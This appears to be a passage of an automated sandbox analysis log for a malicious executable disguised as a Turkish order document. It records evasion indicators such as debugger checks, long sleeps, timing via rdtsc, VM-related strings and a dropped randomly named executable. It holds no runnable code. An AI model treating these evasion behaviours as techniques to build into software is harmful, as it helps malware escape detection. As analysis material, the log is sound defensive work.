            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: 2BF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: 7C70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: 8C70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: 8E20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: 9E20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: A180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: B180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: C180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: D640000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: E640000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: F640000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: FD00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0193096E rdtsc 3_2_0193096E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3531Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1039Jump to behavior
            Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 436Jump to behavior
            Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 9535Jump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe TID: 7532Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\fc.exe TID: 7204Thread sleep count: 436 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\fc.exe TID: 7204Thread sleep time: -872000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\fc.exe TID: 7204Thread sleep count: 9535 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\fc.exe TID: 7204Thread sleep time: -19070000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824Thread sleep count: 42 > 30Jump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824Thread sleep time: -42000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe TID: 5824Thread sleep time: -46500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003ABF60 FindFirstFileW,FindNextFileW,FindClose,9_2_003ABF60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: firefox.exe, 0000000C.00000002.2447212608.000001D97B93C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1684331128.0000000000D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} CoF
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1684331128.0000000000D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: fc.exe, 00000009.00000002.4151524691.0000000000650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152197155.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0193096E rdtsc 3_2_0193096E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_004176B3 LdrLoadDll,3_2_004176B3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197019F mov eax, dword ptr fs:[00000030h]3_2_0197019F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197019F mov eax, dword ptr fs:[00000030h]3_2_0197019F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197019F mov eax, dword ptr fs:[00000030h]3_2_0197019F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197019F mov eax, dword ptr fs:[00000030h]3_2_0197019F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AC188 mov eax, dword ptr fs:[00000030h]3_2_019AC188
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AC188 mov eax, dword ptr fs:[00000030h]3_2_019AC188
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01930185 mov eax, dword ptr fs:[00000030h]3_2_01930185
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EA197 mov eax, dword ptr fs:[00000030h]3_2_018EA197
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EA197 mov eax, dword ptr fs:[00000030h]3_2_018EA197
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EA197 mov eax, dword ptr fs:[00000030h]3_2_018EA197
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01994180 mov eax, dword ptr fs:[00000030h]3_2_01994180
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01994180 mov eax, dword ptr fs:[00000030h]3_2_01994180
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196E1D0 mov eax, dword ptr fs:[00000030h]3_2_0196E1D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196E1D0 mov eax, dword ptr fs:[00000030h]3_2_0196E1D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0196E1D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196E1D0 mov eax, dword ptr fs:[00000030h]3_2_0196E1D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196E1D0 mov eax, dword ptr fs:[00000030h]3_2_0196E1D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B61C3 mov eax, dword ptr fs:[00000030h]3_2_019B61C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B61C3 mov eax, dword ptr fs:[00000030h]3_2_019B61C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019201F8 mov eax, dword ptr fs:[00000030h]3_2_019201F8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C61E5 mov eax, dword ptr fs:[00000030h]3_2_019C61E5
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199A118 mov ecx, dword ptr fs:[00000030h]3_2_0199A118
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199A118 mov eax, dword ptr fs:[00000030h]3_2_0199A118
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199A118 mov eax, dword ptr fs:[00000030h]3_2_0199A118
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199A118 mov eax, dword ptr fs:[00000030h]3_2_0199A118
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B0115 mov eax, dword ptr fs:[00000030h]3_2_019B0115
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E10E mov eax, dword ptr fs:[00000030h]3_2_0199E10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E10E mov ecx, dword ptr fs:[00000030h]3_2_0199E10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E10E mov eax, dword ptr fs:[00000030h]3_2_0199E10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E10E mov eax, dword ptr fs:[00000030h]3_2_0199E10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E10E mov ecx, dword ptr fs:[00000030h]3_2_0199E10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E10E mov eax, dword ptr fs:[00000030h]3_2_0199E10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E10E mov eax, dword ptr fs:[00000030h]3_2_0199E10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E10E mov ecx, dword ptr fs:[00000030h]3_2_0199E10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E10E mov eax, dword ptr fs:[00000030h]3_2_0199E10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E10E mov ecx, dword ptr fs:[00000030h]3_2_0199E10E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01920124 mov eax, dword ptr fs:[00000030h]3_2_01920124
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01988158 mov eax, dword ptr fs:[00000030h]3_2_01988158
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EC156 mov eax, dword ptr fs:[00000030h]3_2_018EC156
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F6154 mov eax, dword ptr fs:[00000030h]3_2_018F6154
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F6154 mov eax, dword ptr fs:[00000030h]3_2_018F6154
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01984144 mov eax, dword ptr fs:[00000030h]3_2_01984144
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01984144 mov eax, dword ptr fs:[00000030h]3_2_01984144
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01984144 mov ecx, dword ptr fs:[00000030h]3_2_01984144
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01984144 mov eax, dword ptr fs:[00000030h]3_2_01984144
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01984144 mov eax, dword ptr fs:[00000030h]3_2_01984144
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4164 mov eax, dword ptr fs:[00000030h]3_2_019C4164
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4164 mov eax, dword ptr fs:[00000030h]3_2_019C4164
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F208A mov eax, dword ptr fs:[00000030h]3_2_018F208A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B60B8 mov eax, dword ptr fs:[00000030h]3_2_019B60B8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B60B8 mov ecx, dword ptr fs:[00000030h]3_2_019B60B8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E80A0 mov eax, dword ptr fs:[00000030h]3_2_018E80A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019880A8 mov eax, dword ptr fs:[00000030h]3_2_019880A8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019720DE mov eax, dword ptr fs:[00000030h]3_2_019720DE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019320F0 mov ecx, dword ptr fs:[00000030h]3_2_019320F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F80E9 mov eax, dword ptr fs:[00000030h]3_2_018F80E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EA0E3 mov ecx, dword ptr fs:[00000030h]3_2_018EA0E3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019760E0 mov eax, dword ptr fs:[00000030h]3_2_019760E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EC0F0 mov eax, dword ptr fs:[00000030h]3_2_018EC0F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190E016 mov eax, dword ptr fs:[00000030h]3_2_0190E016
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190E016 mov eax, dword ptr fs:[00000030h]3_2_0190E016
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190E016 mov eax, dword ptr fs:[00000030h]3_2_0190E016
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190E016 mov eax, dword ptr fs:[00000030h]3_2_0190E016
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01974000 mov ecx, dword ptr fs:[00000030h]3_2_01974000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01992000 mov eax, dword ptr fs:[00000030h]3_2_01992000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01992000 mov eax, dword ptr fs:[00000030h]3_2_01992000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01992000 mov eax, dword ptr fs:[00000030h]3_2_01992000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01992000 mov eax, dword ptr fs:[00000030h]3_2_01992000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01992000 mov eax, dword ptr fs:[00000030h]3_2_01992000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01992000 mov eax, dword ptr fs:[00000030h]3_2_01992000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01992000 mov eax, dword ptr fs:[00000030h]3_2_01992000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01992000 mov eax, dword ptr fs:[00000030h]3_2_01992000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01986030 mov eax, dword ptr fs:[00000030h]3_2_01986030
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EA020 mov eax, dword ptr fs:[00000030h]3_2_018EA020
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EC020 mov eax, dword ptr fs:[00000030h]3_2_018EC020
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01976050 mov eax, dword ptr fs:[00000030h]3_2_01976050
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F2050 mov eax, dword ptr fs:[00000030h]3_2_018F2050
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191C073 mov eax, dword ptr fs:[00000030h]3_2_0191C073
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EE388 mov eax, dword ptr fs:[00000030h]3_2_018EE388
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EE388 mov eax, dword ptr fs:[00000030h]3_2_018EE388
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EE388 mov eax, dword ptr fs:[00000030h]3_2_018EE388
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E8397 mov eax, dword ptr fs:[00000030h]3_2_018E8397
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E8397 mov eax, dword ptr fs:[00000030h]3_2_018E8397
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E8397 mov eax, dword ptr fs:[00000030h]3_2_018E8397
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191438F mov eax, dword ptr fs:[00000030h]3_2_0191438F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191438F mov eax, dword ptr fs:[00000030h]3_2_0191438F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E3DB mov eax, dword ptr fs:[00000030h]3_2_0199E3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E3DB mov eax, dword ptr fs:[00000030h]3_2_0199E3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E3DB mov ecx, dword ptr fs:[00000030h]3_2_0199E3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199E3DB mov eax, dword ptr fs:[00000030h]3_2_0199E3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019943D4 mov eax, dword ptr fs:[00000030h]3_2_019943D4
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019943D4 mov eax, dword ptr fs:[00000030h]3_2_019943D4
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h]3_2_018FA3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h]3_2_018FA3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h]3_2_018FA3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h]3_2_018FA3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h]3_2_018FA3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA3C0 mov eax, dword ptr fs:[00000030h]3_2_018FA3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F83C0 mov eax, dword ptr fs:[00000030h]3_2_018F83C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F83C0 mov eax, dword ptr fs:[00000030h]3_2_018F83C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F83C0 mov eax, dword ptr fs:[00000030h]3_2_018F83C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F83C0 mov eax, dword ptr fs:[00000030h]3_2_018F83C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AC3CD mov eax, dword ptr fs:[00000030h]3_2_019AC3CD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019763C0 mov eax, dword ptr fs:[00000030h]3_2_019763C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190E3F0 mov eax, dword ptr fs:[00000030h]3_2_0190E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190E3F0 mov eax, dword ptr fs:[00000030h]3_2_0190E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190E3F0 mov eax, dword ptr fs:[00000030h]3_2_0190E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019263FF mov eax, dword ptr fs:[00000030h]3_2_019263FF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
